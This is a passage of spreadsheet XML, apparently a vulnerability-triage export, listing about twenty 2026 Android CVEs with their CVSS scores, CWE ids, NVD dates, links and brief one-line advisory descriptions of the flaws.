t="inlineStr" /><c r="K423" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L423" s="5" t="inlineStr" /><c r="M423" s="5" t="inlineStr" /><c r="N423" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O423" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P423" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q423" s="5" t="inlineStr" /><c r="R423" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S423" s="5" t="inlineStr"><is><t>In multiple locations, there is a possible unauthorized URI access due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T423" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28620</t></is></c></row><row r="424"><c r="A424" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B424" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C424" s="5" t="inlineStr"><is><t>CVE-2026-28624</t></is></c><c r="D424" s="5" t="n"><v>7.8</v></c><c r="E424" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F424" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G424" s="5" t="inlineStr" /><c r="H424" s="5" t="n"><v>0.001</v></c><c r="I424" s="5" t="inlineStr" /><c r="J424" s="5" t="inlineStr" /><c r="K424" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L424" s="5" t="inlineStr" /><c r="M424" s="5" t="inlineStr" /><c r="N424" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O424" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P424" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q424" s="5" t="inlineStr" /><c r="R424" s="5" t="inlineStr"><is><t>CWE-441</t></is></c><c r="S424" s="5" t="inlineStr"><is><t>In multiple locations, there is a possible read/write access to files without the proper permissions due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T424" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28624</t></is></c></row><row r="425"><c r="A425" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B425" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C425" s="5" t="inlineStr"><is><t>CVE-2026-28631</t></is></c><c r="D425" s="5" t="n"><v>7.8</v></c><c r="E425" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F425" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G425" s="5" t="inlineStr" /><c r="H425" s="5" t="n"><v>0.001</v></c><c r="I425" s="5" t="inlineStr" /><c r="J425" s="5" t="inlineStr" /><c r="K425" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L425" s="5" t="inlineStr" /><c r="M425" s="5" t="inlineStr" /><c r="N425" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O425" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P425" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q425" s="5" t="inlineStr" /><c r="R425" s="5" t="inlineStr"><is><t>CWE-601</t></is></c><c r="S425" s="5" t="inlineStr"><is><t>In buildMiniResolver of IntentForwarderActivity.java, there is a possible consent bypass due to a tapjacking/overlay attack. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T425" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28631</t></is></c></row><row r="426"><c r="A426" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B426" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C426" s="5" t="inlineStr"><is><t>CVE-2026-28634</t></is></c><c r="D426" s="5" t="n"><v>7.8</v></c><c r="E426" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F426" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G426" s="5" t="inlineStr" /><c r="H426" s="5" t="n"><v>0.001</v></c><c r="I426" s="5" t="inlineStr" /><c r="J426" s="5" t="inlineStr" /><c r="K426" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L426" s="5" t="inlineStr" /><c r="M426" s="5" t="inlineStr" /><c r="N426" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O426" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P426" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q426" s="5" t="inlineStr" /><c r="R426" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="S426" s="5" t="inlineStr"><is><t>In handleUssdRequest of PhoneInterfaceManager.java, there is a possible way to send a USSD request without permission due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T426" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28634</t></is></c></row><row r="427"><c r="A427" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B427" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C427" s="5" t="inlineStr"><is><t>CVE-2026-28636</t></is></c><c r="D427" s="5" t="n"><v>7.8</v></c><c r="E427" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F427" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G427" s="5" t="inlineStr" /><c r="H427" s="5" t="n"><v>0.001</v></c><c r="I427" s="5" t="inlineStr" /><c r="J427" s="5" t="inlineStr" /><c r="K427" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L427" s="5" t="inlineStr" /><c r="M427" s="5" t="inlineStr" /><c r="N427" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O427" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P427" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q427" s="5" t="inlineStr" /><c r="R427" s="5" t="inlineStr"><is><t>CWE-441</t></is></c><c r="S427" s="5" t="inlineStr"><is><t>In setupLayout of PickActivity.java, there is a possible bypass of the "Install unknown apps" security restriction due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T427" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28636</t></is></c></row><row r="428"><c r="A428" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B428" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C428" s="5" t="inlineStr"><is><t>CVE-2026-28639</t></is></c><c r="D428" s="5" t="n"><v>7.8</v></c><c r="E428" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F428" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G428" s="5" t="inlineStr" /><c r="H428" s="5" t="n"><v>0.001</v></c><c r="I428" s="5" t="inlineStr" /><c r="J428" s="5" t="inlineStr" /><c r="K428" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L428" s="5" t="inlineStr" /><c r="M428" s="5" t="inlineStr" /><c r="N428" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O428" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P428" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q428" s="5" t="inlineStr" /><c r="R428" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="S428" s="5" t="inlineStr"><is><t>In rw_mfc_handle_read_op of rw_mfc.cc, there is a possible out of bounds write due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T428" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28639</t></is></c></row><row r="429"><c r="A429" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B429" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C429" s="5" t="inlineStr"><is><t>CVE-2026-28642</t></is></c><c r="D429" s="5" t="n"><v>7.8</v></c><c r="E429" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F429" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G429" s="5" t="inlineStr" /><c r="H429" s="5" t="n"><v>0.001</v></c><c r="I429" s="5" t="inlineStr" /><c r="J429" s="5" t="inlineStr" /><c r="K429" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L429" s="5" t="inlineStr" /><c r="M429" s="5" t="inlineStr" /><c r="N429" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O429" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P429" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q429" s="5" t="inlineStr" /><c r="R429" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="S429" s="5" t="inlineStr"><is><t>In executeRequest of ActivityStarter.java, there is a possible background activity launch due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T429" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28642</t></is></c></row><row r="430"><c r="A430" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B430" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C430" s="5" t="inlineStr"><is><t>CVE-2026-28644</t></is></c><c r="D430" s="5" t="n"><v>7.8</v></c><c r="E430" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F430" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G430" s="5" t="inlineStr" /><c r="H430" s="5" t="n"><v>0.001</v></c><c r="I430" s="5" t="inlineStr" /><c r="J430" s="5" t="inlineStr" /><c r="K430" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L430" s="5" t="inlineStr" /><c r="M430" s="5" t="inlineStr" /><c r="N430" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O430" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P430" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q430" s="5" t="inlineStr" /><c r="R430" s="5" t="inlineStr"><is><t>CWE-441</t></is></c><c r="S430" s="5" t="inlineStr"><is><t>In startNextMatchingActivity of ActivityTaskManagerService.java, there is a possible permission bypass due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T430" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28644</t></is></c></row><row r="431"><c r="A431" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B431" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C431" s="5" t="inlineStr"><is><t>CVE-2026-28650</t></is></c><c r="D431" s="5" t="n"><v>7.8</v></c><c r="E431" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F431" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G431" s="5" t="inlineStr" /><c r="H431" s="5" t="n"><v>0.001</v></c><c r="I431" s="5" t="inlineStr" /><c r="J431" s="5" t="inlineStr" /><c r="K431" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L431" s="5" t="inlineStr" /><c r="M431" s="5" t="inlineStr" /><c r="N431" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O431" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P431" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q431" s="5" t="inlineStr" /><c r="R431" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="S431" s="5" t="inlineStr"><is><t>In setHiddenWhileSuspended of WindowState.java, there is a possible overlay bypass due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T431" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28650</t></is></c></row><row r="432"><c r="A432" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B432" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C432" s="5" t="inlineStr"><is><t>CVE-2026-28653</t></is></c><c r="D432" s="5" t="n"><v>7.8</v></c><c r="E432" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F432" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G432" s="5" t="inlineStr" /><c r="H432" s="5" t="n"><v>0.001</v></c><c r="I432" s="5" t="inlineStr" /><c r="J432" s="5" t="inlineStr" /><c r="K432" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L432" s="5" t="inlineStr" /><c r="M432" s="5" t="inlineStr" /><c r="N432" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O432" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P432" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q432" s="5" t="inlineStr" /><c r="R432" s="5" t="inlineStr"><is><t>CWE-1190, CWE-787</t></is></c><c r="S432" s="5" t="inlineStr"><is><t>In multiple functions of rw_t3t.cc, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T432" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28653</t></is></c></row><row r="433"><c r="A433" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B433" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C433" s="5" t="inlineStr"><is><t>CVE-2026-28655</t></is></c><c r="D433" s="5" t="n"><v>7.8</v></c><c r="E433" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F433" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G433" s="5" t="inlineStr" /><c r="H433" s="5" t="n"><v>0.001</v></c><c r="I433" s="5" t="inlineStr" /><c r="J433" s="5" t="inlineStr" /><c r="K433" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L433" s="5" t="inlineStr" /><c r="M433" s="5" t="inlineStr" /><c r="N433" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O433" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P433" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q433" s="5" t="inlineStr" /><c r="R433" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="S433" s="5" t="inlineStr"><is><t>In multiple functions of RemoteViews.java, there is a possible background activity launch bypass due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T433" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28655</t></is></c></row><row r="434"><c r="A434" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B434" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C434" s="5" t="inlineStr"><is><t>CVE-2026-28657</t></is></c><c r="D434" s="5" t="n"><v>7.8</v></c><c r="E434" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F434" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G434" s="5" t="inlineStr" /><c r="H434" s="5" t="n"><v>0.001</v></c><c r="I434" s="5" t="inlineStr" /><c r="J434" s="5" t="inlineStr" /><c r="K434" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L434" s="5" t="inlineStr" /><c r="M434" s="5" t="inlineStr" /><c r="N434" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O434" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P434" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q434" s="5" t="inlineStr" /><c r="R434" s="5" t="inlineStr"><is><t>CWE-441</t></is></c><c r="S434" s="5" t="inlineStr"><is><t>In onActivityResult of AppWidgetConfigActivityProxy.java, there is a possible unauthorized URI permission grant due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T434" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28657</t></is></c></row><row r="435"><c r="A435" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B435" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C435" s="5" t="inlineStr"><is><t>CVE-2026-28658</t></is></c><c r="D435" s="5" t="n"><v>7.8</v></c><c r="E435" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F435" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G435" s="5" t="inlineStr" /><c r="H435" s="5" t="n"><v>0.001</v></c><c r="I435" s="5" t="inlineStr" /><c r="J435" s="5" t="inlineStr" /><c r="K435" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L435" s="5" t="inlineStr" /><c r="M435" s="5" t="inlineStr" /><c r="N435" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O435" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P435" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q435" s="5" t="inlineStr" /><c r="R435" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="S435" s="5" t="inlineStr"><is><t>In findMetaAuthUid of AccountsDb.java, there is a possible frp bypass due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T435" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28658</t></is></c></row><row r="436"><c r="A436" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B436" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C436" s="5" t="inlineStr"><is><t>CVE-2026-28659</t></is></c><c r="D436" s="5" t="n"><v>7.8</v></c><c r="E436" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F436" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G436" s="5" t="inlineStr" /><c r="H436" s="5" t="n"><v>0.001</v></c><c r="I436" s="5" t="inlineStr" /><c r="J436" s="5" t="inlineStr" /><c r="K436" s="5" t="inlineStr"><is><t>google:android_xr</t></is></c><c r="L436" s="5" t="inlineStr" /><c r="M436" s="5" t="inlineStr" /><c r="N436" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O436" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P436" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q436" s="5" t="inlineStr" /><c r="R436" s="5" t="inlineStr"><is><t>CWE-269</t></is></c><c r="S436" s="5" t="inlineStr"><is><t>In MicroXR Blobstore, there is a possible way to access other app's files due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T436" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28659</t></is></c></row><row r="437"><c r="A437" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B437" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C437" s="5" t="inlineStr"><is><t>CVE-2026-28663</t></is></c><c r="D437" s="5" t="n"><v>7.8</v></c><c r="E437" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F437" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G437" s="5" t="inlineStr" /><c r="H437" s="5" t="n"><v>0.001</v></c><c r="I437" s="5" t="inlineStr" /><c r="J437" s="5" t="inlineStr" /><c r="K437" s="5" t="inlineStr" /><c r="L437" s="5" t="inlineStr" /><c r="M437" s="5" t="inlineStr" /><c r="N437" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O437" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P437" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q437" s="5" t="inlineStr" /><c r="R437" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S437" s="5" t="inlineStr"><is><t>In buildIntentSenderForUser of LauncherAppsService.java, there is a possible way to launch an activity from the background due to BAL Bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T437" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28663</t></is></c></row><row r="438"><c r="A438" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B438" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C438" s="5" t="inlineStr"><is><t>CVE-2026-28664</t></is></c><c r="D438" s="5" t="n"><v>7.8</v></c><c r="E438" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F438" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G438" s="5" t="inlineStr" /><c r="H438" s="5" t="n"><v>0.001</v></c><c r="I438" s="5" t="inlineStr" /><c r="J438" s="5" t="inlineStr" /><c r="K438" s="5" t="inlineStr" /><c r="L438" s="5" t="inlineStr" /><c r="M438" s="5" t="inlineStr" /><c r="N438" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O438" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P438" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q438" s="5" t="inlineStr" /><c r="R438" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="S438" s="5" t="inlineStr"><is><t>In WriteImageToDisk of runtime_image.cc, there is a possible file tampering due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T438" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28664</t></is></c></row><row r="439"><c r="A439" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B439" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C439" s="5" t="inlineStr"><is><t>CVE-2026-28668</t></is></c><c r="D439" s="5" t="n"><v>7.8</v></c><c r="E439" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F439" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G439" s="5" t="inlineStr" /><c r="H439" s="5" t="n"><v>0.001</v></c><c r="I439" s="5" t="inlineStr" /><c r="J439" s="5" t="inlineStr" /><c r="K439" s="5" t="inlineStr" /><c r="L439" s="5" t="inlineStr" /><c r="M439" s="5" t="inlineStr" /><c r="N439" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O439" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P439" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q439" s="5" t="inlineStr" /><c r="R439" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="S439" s="5" t="inlineStr"><is><t>In LimitRealloc of malloc_limit.cpp, there is a possible use after free due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T439" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28668</t></is></c></row><row r="440"><c r="A440" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B440" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C440" s="5" t="inlineStr"><is><t>CVE-2026-45515</t></is></c><c r="D440" s="5" t="n"><v>7.8</v></c><c r="E440" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F440" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G440" s="5" t="inlineStr" /><c r="H440" s="5" t="n"><v>0.001</v></c><c r="I440" s="5" t="inlineStr" /><c r="J440" s="5" t="inlineStr" /><c r="K440" s="5" t="inlineStr" /><c r="L440" s="5" t="inlineStr" /><c r="M440" s="5" t="inlineStr" /><c r="N440" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O440" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P440" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q440" s="5" t="inlineStr" /><c r="R440" s="5" t="inlineStr"><is><t>CWE-122, CWE-787</t></is></c><c r="S440" s="5" t="inlineStr"><is><t>In a2dp_vendor_opus_decoder_decode_packet of a2dp_vendor_opus_decoder.cc, there is a possible out of bounds write due to a heap buffer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T440" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-45515</t></is></c></row><row r="441"><c r="A441" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B441" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C441" s="5" t="inlineStr"><is><t>CVE-2026-45520</t></is></c><c r="D441" s="5" t="n"><v>7.8</v></c><c r="E441" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F441" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G441" s="5" t="inlineStr" /><c r="H441" s="5" t="n"><v>0.001</v></c><c r="I441" s="5" t="inlineStr" /><c r="J441" s="5" t="inlineStr" /><c r="K441" s="5" t="inlineStr" /><c r="L441" s="5" t="inlineStr" /><c r="M441" s="5" t="inlineStr" /><c r="N441" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O441" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P441" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q441" s="5" t="inlineStr" /><c r="R441" s="5" t="inlineStr"><is><t>CWE-441</t></is></c><c r="S441" s="5" t="inlineStr"><is><t>In onAttach of BiometricsSettingsBase.java, there is a possible authentication bypass due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T441" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-45520</t></is></c></row><row r="442"><c r="A442" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B442" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C442" s="5" t="inlineStr"><is><t>CVE-2026-45531</t></is></c><c r="D442" s="5" t="n"><v>7.8</v></c><c r="E442" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F442" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G442" s="5" t="inlineStr" /><c r="H442" s="5" t="n"><v>0.001</v></c><c r="I442" s="5" t="inlineStr" /><c r="J442" s="5" t="inlineStr" /><c r="K442" s="5" t="inlineStr" /><c r="L442" s="5" t="inlineStr" /><c r="M442" s="5" t="inlineStr" /><c r="N442" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O442" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P442" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q442" s="5" t="inlineStr" /><c r="R442" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S442" s="5" t="inlineStr"><is><t>In read_boot_region of fsck.c, there is a possible out of bounds read due to a heap buffer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T442" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-45531</t></is></c></row><row r="443"><c r="A443" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B443" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C443" s="5" t="inlineStr"><is><t>CVE-2026-49881</t></is></c><c r="D443" s="5" t="n"><v>7.8</v></c><c r="E443" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F443" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G443" s="5" t="inlineStr" /><c r="H443" s="5" t="n"><v>0.001</v></c><c r="I443" s="5" t="inlineStr" /><c r="J443" s="5" t="inlineStr" /><c r="K443" s="5" t="inlineStr" /><c r="L443" s="5" t="inlineStr" /><c r="M443" s="5" t="inlineStr" /><c r="N443" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O443" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P443" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q443" s="5" t="inlineStr" /><c r="R443" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="S443" s="5" t="inlineStr"><is><t>In serviceClassExists of InCallController.java, there is a possible arbitrary code execution due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T443" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-49881</t></is></c></row><row r="444"><c r="A444" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B444" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C444" s="5" t="inlineStr"><is><t>CVE-2026-49884</t></is></c><c r="D444" s="5" t="n"><v>7.8</v></c><c r="E444" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F444" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G444" s="5" t="inlineStr" /><c r="H444" s="5" t="n"><v>0.001</v></c><c r="I444" s="5" t="inlineStr" /><c r="J444" s="5" t="inlineStr" /><c 